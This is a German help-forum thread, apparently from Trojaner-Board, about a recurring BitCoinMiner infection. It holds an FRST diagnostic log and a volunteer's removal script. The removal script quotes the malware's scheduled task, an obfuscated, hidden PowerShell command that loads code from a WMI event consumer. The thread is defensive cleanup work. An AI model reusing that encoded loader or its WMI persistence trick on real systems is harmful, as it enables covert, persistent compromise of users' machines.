(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{AB0D4999-F72B-44E4-BA1A-EA9F7A3BF36F}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [Datei ist nicht signiert]
FirewallRules: [{4F51BEE8-D8C7-4178-9E56-74AF2734393E}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [Datei ist nicht signiert]
FirewallRules: [{569AACD8-4E78-4D21-BD54-DFB056DD63E4}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{2D46D295-17A7-4161-AE3B-B00AD617D3A6}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{97269470-7E63-4738-B117-B84BA0782D34}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{30EF33EA-F487-4B73-B882-C877FC9117FD}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{1D9A3742-7E1F-4436-93EF-EC44BA065CC4}] => (Allow) C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe (Brave Software, Inc. -> Brave Software, Inc.)
FirewallRules: [{d33913f5-4ba1-4481-92dd-749f9badce14}] => (Allow) C:\Windows\Performance\B5C28570-CD05-0000-0000-000000000000\Services.exe => Keine Datei
FirewallRules: [{EC6CBB9A-C0FA-4249-97F6-D874F4463B63}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gothic II\system\Gothic2.exe (Piranha Bytes) [Datei ist nicht signiert]
FirewallRules: [{F1A3DDE1-B154-4AF8-A1FE-F0CED599DED2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gothic II\system\Gothic2.exe (Piranha Bytes) [Datei ist nicht signiert]
FirewallRules: [{2AECF372-E016-4CB2-9DE2-1FC6B13CC35F}] => (Allow) C:\Program Files (x86)\Nsasoft\ProductKeyExplorer\ProductKeyExplorer.exe => Keine Datei
FirewallRules: [{8C073468-8569-4C33-8F2E-5901510D44B7}] => (Allow) C:\Program Files (x86)\Nsasoft\ProductKeyExplorer\ProductKeyExplorer.exe => Keine Datei

==================== Wiederherstellungspunkte =========================

13-01-2021 12:04:31 Geplanter Prüfpunkt
13-01-2021 15:05:11 Windows Modules Installer
14-01-2021 16:07:25 Prüfpunkt von HitmanPro

==================== Fehlerhafte Geräte im Gerätemanager ============


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (01/14/2021 04:07:25 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.


Vorgang:
   Generatordaten werden gesammelt

Kontext:
   Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
   Generatorname: System Writer
   Generatorinstanz-ID: {102c52e0-d146-4436-afbf-cd3927a88498}

Error: (01/14/2021 04:03:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: mb-support.exe, Version: 1.8.0.848, Zeitstempel: 0x5f7026d5
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.19041.662, Zeitstempel: 0xe6477cce
Ausnahmecode: 0xe0434352
Fehleroffset: 0x0012a892
ID des fehlerhaften Prozesses: 0x1430
Startzeit der fehlerhaften Anwendung: 0x01d6ea867c730da6
Pfad der fehlerhaften Anwendung: C:\Users\dkads\AppData\Local\Temp\mwb8908.tmp\mb-support.exe
Pfad des fehlerhaften Moduls: C:\Windows\System32\KERNELBASE.dll
Berichtskennung: b9c22369-fa26-490e-878e-a3aa09357ffb
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (01/14/2021 04:03:59 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Anwendung: mb-support.exe
Frameworkversion: v4.0.30319
Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet.
Ausnahmeinformationen: System.UriFormatException
   bei System.Uri.CreateThis(System.String, Boolean, System.UriKind)
   bei System.Uri..ctor(System.String, System.UriKind)
   bei MS.Internal.FontCache.Util..cctor()

Ausnahmeinformationen: System.TypeInitializationException
   bei MS.Internal.FontCache.Util.get_Dpi()
   bei System.Windows.SystemFonts.ConvertFontHeight(Int32)
   bei System.Windows.Documents.TextElement..cctor()

Ausnahmeinformationen: System.TypeInitializationException
   bei System.Windows.FrameworkElement..cctor()

Ausnahmeinformationen: System.TypeInitializationException
   bei System.Windows.Controls.ContentControl..cctor()

Ausnahmeinformationen: System.TypeInitializationException
   bei System.Runtime.CompilerServices.RuntimeHelpers._RunClassConstructor(System.RuntimeType)
   bei System.Windows.DependencyProperty.FromName(System.String, System.Type)
   bei System.Windows.Markup.DependencyPropertyConverter.ResolveProperty(System.IServiceProvider, System.String, System.Object)
   bei System.Windows.Setter.System.ComponentModel.ISupportInitialize.EndInit()
   bei MS.Internal.Xaml.Runtime.ClrObjectRuntime.InitializationGuard(System.Xaml.XamlType, System.Object, Boolean)

Ausnahmeinformationen: System.Windows.Markup.XamlParseException
   bei System.Windows.Markup.WpfXamlLoader.Load(System.Xaml.XamlReader, System.Xaml.IXamlObjectWriterFactory, Boolean, System.Object, System.Xaml.XamlObjectWriterSettings, System.Uri)
   bei System.Windows.Markup.WpfXamlLoader.LoadBaml(System.Xaml.XamlReader, Boolean, System.Object, System.Xaml.Permissions.XamlAccessLevel, System.Uri)
   bei System.Windows.Markup.XamlReader.LoadBaml(System.IO.Stream, System.Windows.Markup.ParserContext, System.Object, Boolean)
   bei System.Windows.Application.LoadComponent(System.Object, System.Uri)
   bei mbsupport.App.InitializeComponent()
   bei mbsupport.App.Main()

Error: (01/14/2021 04:00:14 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Das Sicherheitscenter konnte den Aufrufer nicht überprüfen. Der Fehler %1 ist aufgetreten.

Error: (01/14/2021 03:41:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: SystemSettingsAdminFlows.exe, Version: 10.0.19041.610, Zeitstempel: 0xe8918e21
Name des fehlerhaften Moduls: Facilitator.dll_unloaded, Version: 10.0.19041.572, Zeitstempel: 0xa8883009
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000004d141
ID des fehlerhaften Prozesses: 0x2230
Startzeit der fehlerhaften Anwendung: 0x01d6ea82ef7ae49f
Pfad der fehlerhaften Anwendung: C:\Windows\system32\SystemSettingsAdminFlows.exe
Pfad des fehlerhaften Moduls: Facilitator.dll
Berichtskennung: 9519a87b-ce81-478a-b3f8-4bd21c576626
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (01/14/2021 03:00:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: SDScan.exe, Version: 2.8.68.193, Zeitstempel: 0x5ea5dfb4
Name des fehlerhaften Moduls: SDScanLibrary.dll_unloaded, Version: 2.8.68.132, Zeitstempel: 0x5ea5dff7
Ausnahmecode: 0xc0000005
Fehleroffset: 0x001d4884
ID des fehlerhaften Prozesses: 0x1f1c
Startzeit der fehlerhaften Anwendung: 0x01d6ea7bc4f9b6d2
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe
Pfad des fehlerhaften Moduls: SDScanLibrary.dll
Berichtskennung: 05d6e460-c51a-42e7-97d2-5a57391e030a
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (01/14/2021 02:56:41 PM) (Source: SideBySide) (EventID: 9) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "C:\Windows\System32\sdnclean64.exe". Fehler in Manifest- oder Richtliniendatei "C:\Windows\System32\sdnclean64.exe" in Zeile 2.
Das Stammelement der Manifestdatei muss assembliert sein.

Error: (01/14/2021 02:34:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: SystemSettings.exe, Version: 10.0.19041.610, Zeitstempel: 0x07896577
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.19041.662, Zeitstempel: 0xec58f015
Ausnahmecode: 0xc000027b
Fehleroffset: 0x000000000010bd5c
ID des fehlerhaften Prozesses: 0x1168
Startzeit der fehlerhaften Anwendung: 0x01d6ea729a79c5b8
Pfad der fehlerhaften Anwendung: C:\Windows\ImmersiveControlPanel\SystemSettings.exe
Pfad des fehlerhaften Moduls: C:\Windows\System32\KERNELBASE.dll
Berichtskennung: ec1017dc-6a63-468b-a22f-dcdbe6730269
Vollständiger Name des fehlerhaften Pakets: windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: microsoft.windows.immersivecontrolpanel


Systemfehler:
=============
Error: (01/14/2021 04:14:17 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-V80PEH8)
Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/14/2021 03:35:57 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "wuauserv" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{E60687F7-01A1-40AA-86AC-DB1CBF673334}

Error: (01/14/2021 03:35:57 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "wuauserv" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{E60687F7-01A1-40AA-86AC-DB1CBF673334}

Error: (01/14/2021 03:35:57 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "wuauserv" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{E60687F7-01A1-40AA-86AC-DB1CBF673334}

Error: (01/14/2021 03:30:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "eapihdrv" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Treiber konnte nicht geladen werden.

Error: (01/14/2021 03:30:55 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\dkads\AppData\Local\Temp\ehdrv.sys

Error: (01/14/2021 03:30:54 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "eapihdrv" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Treiber konnte nicht geladen werden.

Error: (01/14/2021 03:30:54 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\dkads\AppData\Local\Temp\ehdrv.sys


Windows Defender:
===================================
Date: 2021-01-11 15:56:12.6730000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=Behavior:Win32/UACBypassExp.ZI&threatid=2147766807&enterprise=0
Name: Behavior:Win32/UACBypassExp.ZI
ID: 2147766807
Schweregrad: Schwerwiegend
Kategorie: Verdächtiges Verhalten
Pfad: behavior:_pid:9176:63445214960330; process:_pid:9176,ProcessStart:132548505685525176
Erkennungsursprung: Unbekannt
Erkennungstype: Konkret
Erkennungsquelle: System
Benutzer: NT-AUTORITÄT\SYSTEM
Prozessname: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Sicherheitsversion: AV: 1.329.1965.0, AS: 1.329.1965.0, NIS: 1.329.1965.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-09 18:27:41.9700000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {6571004D-6E72-45D9-ACAB-8852D3F23ECA}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2021-01-08 12:15:59.0950000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=SettingsModifier:Win32/HostsFileHijack&threatid=265754&enterprise=0
Name: SettingsModifier:Win32/HostsFileHijack
ID: 265754
Schweregrad: Schwerwiegend
Kategorie: Einstellungsveränderer
Pfad: file:_C:\Windows\System32\drivers\etc\hosts
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: DESKTOP-V80PEH8\dkads
Prozessname: C:\Users\dkads\Downloads\dwt-3.2.3-cp27-win_x86\DisableWinTracking.exe
Sicherheitsversion: AV: 1.329.1858.0, AS: 1.329.1858.0, NIS: 1.329.1858.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-14 12:13:45.8650000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.329.2066.0
Update Source: Microsoft Update-Server
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.17700.4
Fehlercode: 0x80070422
Fehlerbeschreibung: Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden. 

Date: 2021-01-13 23:59:15.4800000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.329.2066.0
Update Source: Microsoft Update-Server
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.17700.4
Fehlercode: 0x80070422
Fehlerbeschreibung: Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden. 

Date: 2021-01-13 16:28:08.5520000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.329.2066.0
Update Source: Microsoft Update-Server
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.17700.4
Fehlercode: 0x80070422
Fehlerbeschreibung: Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden. 

Date: 2021-01-13 12:04:09.0470000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.329.2066.0
Update Source: Microsoft Update-Server
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.17700.4
Fehlercode: 0x80070422
Fehlerbeschreibung: Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden. 

Date: 2021-01-12 15:17:01.4080000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.329.2066.0
Update Source: Microsoft Update-Server
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.17700.4
Fehlercode: 0x80070422
Fehlerbeschreibung: Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden. 

CodeIntegrity:
===================================

Date: 2021-01-14 16:07:53.9790000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2021-01-14 16:07:53.4500000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2021-01-14 16:07:53.4430000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2021-01-14 16:07:53.1340000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2021-01-14 15:16:12.2710000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Spybot - Search & Destroy 2\SDLicense.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2021-01-14 14:46:24.7700000Z
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2021-01-14 14:46:21.6110000Z
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2021-01-14 14:45:12.1090000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Speicherinformationen =========================== 

BIOS: American Megatrends Inc. P6.60 07/27/2020
Hauptplatine: ASRock AB350M Pro4
Prozessor: AMD Ryzen 5 2600 Six-Core Processor 
Prozentuale Nutzung des RAM: 21%
Installierter physikalischer RAM: 16315.63 MB
Verfügbarer physikalischer RAM: 12871.88 MB
Summe virtueller Speicher: 19259.63 MB
Verfügbarer virtueller Speicher: 12713.68 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.86 GB) (Free:194.91 GB) NTFS
Drive d: (Volume) (Fixed) (Total:464 GB) (Free:47.87 GB) NTFS
Drive e: () (Fixed) (Total:931.51 GB) (Free:435.8 GB) NTFS

\\?\Volume{a2b727dd-771f-4565-a8f9-4ea4baae0cf1}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS
\\?\Volume{77272145-f880-4443-b394-8c2d20ddc274}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: C8F2097D)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=42)

==========================================================
Disk: 1 (Size: 238.5 GB) (Disk ID: FFE4C6A1)

Partition: GPT.

==========================================================
Disk: 2 (Protective MBR) (Size: 465.8 GB) (Disk ID: 00000000)

Partition: GPT.
Attempted reading MBR returned 0 bytes.
 Could not read MBR for disk 3.

==================== Ende von Addition.txt =======================
         

Alt 14.01.2021, 20:10   #2
M-K-D-B
/// TB-Ausbilder
 
Windows 10: RiskWare.BitCoinMiner bei jedem Neustart - Standard

Windows 10: RiskWare.BitCoinMiner bei jedem Neustart







Mein Name ist Matthias und ich werde dir bei der Analyse und der eventuell notwendigen Bereinigung deines Computers helfen.



Ich analysiere gerade dein System und melde mich in Kürze mit weiteren Anweisungen.
__________________

__________________

Alt 14.01.2021, 20:34   #3
M-K-D-B
/// TB-Ausbilder
 
Windows 10: RiskWare.BitCoinMiner bei jedem Neustart - Standard

Windows 10: RiskWare.BitCoinMiner bei jedem Neustart



Schritt 1
  • Speichere deine Arbeiten und schließe alle offenen Programme, damit keine Daten verloren gehen.
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    CloseProcesses:
    Unlock: C:\Windows\System32\Tasks\Microsoft\Windows\PowerShell\B5C28570-CD05-0000-0000-000000000000
    CMD: type "C:\Windows\System32\Tasks\Microsoft\Windows\PowerShell\B5C28570-CD05-0000-0000-000000000000"
    Task: {9DB440B8-D809-4CDC-B7C9-517D21E21457} - System32\Tasks\Microsoft\Windows\PowerShell\B5C28570-CD05-0000-0000-000000000000 => PowerShell.exe -NoP -NonI -EP ByPass -Win Hidden -E WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEcAZQB0AC0AVwBNAEkATwBiAGoAZQBjAHQAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdABcAFMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAALQBDAGwAYQBzAHMAIABMAG8AZwBGAGkAbABlAEUAdgBlAG4AdABDAG8AbgBzAHUAbQBlAHIAIAB8ACAAdwBoAGUAcgBlAC0AbwBiAGoAZQBjAHQAIAB7ACQAXwAuAE4AYQBtAGUAIAAtAEwAaQBrAGUAIAAnAEUATABEACcAfQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBlAHgAcABhAG4AZABwAHIAbwBwAGUAcgB0AHkAIABUAGUAeAB0ACAAKQAuAHMAcABsAGkAdAAoACIAIAAiACkAKQAgAHwAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4A
    C:\Windows\Performance\B5C28570-CD05-0000-0000-000000000000
    BootExecute: autocheck autochk * sdnclean64.exe
    AV: Spybot - Search and Destroy (Disabled - Out of date) {F77C7796-45C4-531E-0DAE-B4A8229B11C8}
    WMI:subscription\LogFileEventConsumer->ELD::
    WMI:subscription\LogFileEventConsumer->Ephedra::
    CMD: ipconfig /flushdns
    CMD: netsh winsock reset
    CMD: netsh advfirewall reset
    CMD: netsh advfirewall set allprofiles state ON
    CMD: Bitsadmin /Reset /Allusers
    Hosts:
    RemoveProxy:
    SystemRestore: On 
    EmptyTemp:
    End::
             
  • Starte nun FRST und klicke direkt den Reparieren Button.
    Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.





Schritt 2
  • Starte FRST erneut. Kopiere den Inhalt der folgenden Code-Box oben in das Suchfeld:
    Code:
    ATTFilter
    SearchAll: B5C28570-CD05-0000-0000-000000000000
             
  • Klicke auf den Button Datei-Suche.
  • FRST beginnt mit dem Suchlauf. Das kann einige Zeit dauern, bitte gedulde dich!
  • Am Ende wird eine Textdatei Search.txt erstellt.
  • Poste mir deren Inhalt mit deiner nächsten Antwort.





Schritt 3
  • Starte FRST erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
  • FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.





Bitte poste mit deiner nächsten Antwort:
  • die Logdatei des FRST-Fix (fixlog.txt)
  • die Logdatei des FRST-Suchlaufs (Search.txt)
  • die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt)
__________________
__________________

Alt 17.01.2021, 12:03   #4
M-K-D-B
/// TB-Ausbilder
 
Windows 10: RiskWare.BitCoinMiner bei jedem Neustart - Standard

Windows 10: RiskWare.BitCoinMiner bei jedem Neustart



Fehlende Rückmeldung
Dieses Thema wurde aus unseren Abos gelöscht. Somit bekommen wir keine Benachrichtigung über neue Antworten.
Solltest Du das Thema erneut brauchen, schicke uns bitte eine Erinnerung inklusive Link zum Thema.

Hinweis: Das Verschwinden der Symptome bedeutet nicht, dass Dein Rechner schon sauber ist.

Jeder andere bitte hier klicken und ein eigenes Thema erstellen!

Thema geschlossen

Themen zu Windows 10: RiskWare.BitCoinMiner bei jedem Neustart
administrator, adobe, antivirus, computer, defender, escan, explorer, firefox, firewall, internet, internet explorer, microsoft, mozilla, neustart, nvidia, ordner, performance, popup, prozesse, realtek, registry, scan, services.exe, shark, windows



Ähnliche Themen: Windows 10: RiskWare.BitCoinMiner bei jedem Neustart


  1. Windows 10: Task Manager nach jedem Windows-Neustart deaktiviert
    Log-Analyse und Auswertung - 12.01.2021 (2)
  2. Windows 10: Trojan.GenerickKD.43938181 taucht bei jedem Neustart im Temp Ordner auf.
    Log-Analyse und Auswertung - 12.10.2020 (17)
  3. Windows 10: TR/AD.Fire.Hooker.BU wird von Avira bei jedem Neustart gemeldet
    Log-Analyse und Auswertung - 07.10.2020 (23)
  4. Riskware: BitcoinMiner entdeckt
    Plagegeister aller Art und deren Bekämpfung - 27.03.2019 (30)
  5. RiskWare.BitCoinMiner Trojan entfernen
    Anleitungen, FAQs & Links - 06.11.2017 (2)
  6. Bei jedem Neustart Popup "Windows Befehlsprozessor" mit Aufforderung nach Administratorkennwort
    Alles rund um Windows - 22.06.2016 (0)
  7. Windows 10: Datei C:\ProgramData\TXQMPC\NWF3OptHis.HIS installiert sich bei jedem Neustart
    Log-Analyse und Auswertung - 11.04.2016 (20)
  8. Windows 7 öffnet nach jedem Neustart den Ordner "System32"
    Log-Analyse und Auswertung - 02.02.2016 (24)
  9. Windows 7 nach jedem Neustart kein Internet mehr
    Plagegeister aller Art und deren Bekämpfung - 22.06.2014 (3)
  10. Windows XP SP2 GVU-Trojaner-Befall bei jedem Neustart
    Log-Analyse und Auswertung - 07.11.2013 (9)
  11. SoftwareUpdater.UI.exe erscheint bei jedem Neustart.
    Log-Analyse und Auswertung - 25.10.2013 (29)
  12. wssetup.exe von Perion Ltd. bei jedem Neustart
    Plagegeister aller Art und deren Bekämpfung - 25.06.2013 (7)
  13. deo0_sar.exe bei jedem Neustart (Win Vista x64)
    Log-Analyse und Auswertung - 30.08.2012 (18)
  14. PWS-Spyeye!conf bei jedem Neustart
    Log-Analyse und Auswertung - 03.02.2012 (12)
  15. Datenträgerreaktiverung - bei jedem Neustart , PROBLEM!
    Alles rund um Windows - 29.06.2011 (17)
  16. Trojanerfund bei jedem Neustart? Twex.exe
    Log-Analyse und Auswertung - 04.02.2009 (26)
  17. 2 Fehlermeldungen bei jedem neustart / startdrv.exe
    Log-Analyse und Auswertung - 10.08.2008 (0)

Zum Thema Windows 10: RiskWare.BitCoinMiner bei jedem Neustart - Hallo, bei jedem Neustart schlägt bei mir Malwarebytes an. Einmal wegen RiskWare.BitCoinMiner und einmal "polarbearminingsystems.com". Vielen Dank für die Hilfe schonmal Malwarebytes Code: Alles auswählen Aufklappen ATTFilter Malwarebytes www.malwarebytes.com -Protokolldetails- - Windows 10: RiskWare.BitCoinMiner bei jedem Neustart...
Archiv
Du betrachtest: Windows 10: RiskWare.BitCoinMiner bei jedem Neustart auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.